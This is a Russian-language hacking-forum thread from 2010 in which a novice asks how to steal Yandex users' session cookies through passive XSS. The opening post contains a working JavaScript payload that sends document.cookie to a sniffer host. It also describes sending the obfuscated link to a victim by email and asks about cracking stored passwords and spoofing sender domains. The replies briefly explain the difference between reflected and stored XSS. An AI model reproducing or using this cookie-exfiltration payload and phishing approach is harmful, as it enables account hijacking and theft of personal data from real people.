XSS Yandex

Discussion in 'Песочница' started by ZeroCold, 5 May 2010.

  1. ZeroCold

    ZeroCold New Member

    Joined:
    9 Mar 2010
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток.
    Собственно первый раз в жизни решил занятся xss развлечениями.

    ПРочитал статью xss для начинающих, остаось несколько вопросв которые хотелось задать сообществу.

    Вобщем как я понимаю на яндексе искать активны хсс дело не благодарное, поэтому стоит использовать пассивные.
    Собственно первый вопрос, правильно ли я понимаю значение смысла слова пассивные - я создаю скрипт перехвата кук
    Code:
    <script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
    предварителньо запихнув его в какой либо фаил(упс.js)
    Затем я делаю линк на этот скрипт, ну и как либо еш шифрую и пердаю жертве. Например почтой.
    Теперь вопрос если жертва перейдет по линку я получу куки яндекса жертвы, или я неправильно понимаю смысл слова пассивные?
    И еще вопрос, я так понимаю что в коде скрипта надо указать с сылку на снифер т.е. в место
    Code:
    "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
    надо написать
    Code:
    "http://мойсайт/путь до снифера/подставной указанный в снифере.gif?"+document.cookie;
</script>
    Правильно ли я себе представляю работу пассивной xss уязвимости?
    Нужно ли указывать гиф при добавлении кода в ifarame?
    Хранятся ли пароли Яндекс почты в куках пусть даже в зашефрованном виде и можно ли их вскрыть? в смысле разгадать.
    Можно ли добавить какую либо картинку в тело письма что бы получить подобный эффект, при условии что человек снимет ограничение на загрузку картинок?
    И последний вопрос до сих пор осталось возможность отправлять письма с "подставных" доменов, т.е. например с того же вконтакта?
     
    #1 ZeroCold, 5 May 2010
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    1. Это активная.
    2. На Яндексе паблик xss нету.
     
    #2 Ctacok, 5 May 2010
  3. Greaves

    Greaves Banned

    Joined:
    7 Apr 2007
    Messages:
    40
    Likes Received:
    21
    Reputations:
    0
    3. Активные XSS - http://forum.antichat.ru/thread35802.html Правила читай на вверху же в топе закреплена тема с Хсс.
    PS: Ничего сверх естественного ты не нашел - к сожалению ты вообще ничего не нашел.
     
    #3 Greaves, 5 May 2010
  4. ZeroCold

    ZeroCold New Member

    Joined:
    9 Mar 2010
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Может я некорректно выразился, но я и не говорил что что либо нашел, я попробую перефразировать.
    Я первы раз сталкиваюсь с хсс атакой.
    Нашел тучи описаний об активных атаках, собственно вопрос, как выглядят пассивные атаки. т.е.
    я так понимаю что если дать линк в письме на xss на другой сайт то кук яндекса мне невидать, правильно я понимаю?
     
    #4 ZeroCold, 5 May 2010
    Last edited: 5 May 2010
  5. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Пассивная XSS, это такая же XSS, как и активная, просто тебе нужно заставить юзера перейти по твоей ссылке с JS кодом и он точно так же выполниться
     
    #5 h00lyshit!, 5 May 2010
    Last edited: 5 May 2010
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.